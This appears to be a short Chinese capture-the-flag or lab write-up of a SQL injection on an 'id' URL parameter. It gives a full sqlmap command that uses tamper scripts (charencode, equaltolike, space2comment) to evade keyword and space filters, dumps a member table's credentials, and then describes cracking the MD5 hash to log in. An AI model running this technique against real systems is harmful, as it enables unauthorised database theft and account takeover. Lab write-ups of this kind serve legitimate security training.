经过测试,确定注入点在维护界面的URL链接的id参数中,并且后台有关键字以及特殊字符的过滤,等号以及空格被过滤,要做URL编码绕过。
sqlmap注入:
上sqlmap前,要先了解SQLMAP的绕过脚本使用,这题中使用到了三个绕过脚本:
1.charencode脚本:URL编码脚本;
2.equaltolike脚本:将等号转换为like脚本;
3.space2comment脚本:空格绕过脚本。
payload:
python sqlmap.py -u "http://219.153.49.228:44260/new_list.php?id=1" --tamper charencode,equaltolike,space2comment -D mozhe_discuz_stormgroup -T stormgroup_member -C 'status,name,password' --dump --batch
将status为1的密码MD5解密一下即可得到登录密码,接着登录拿key~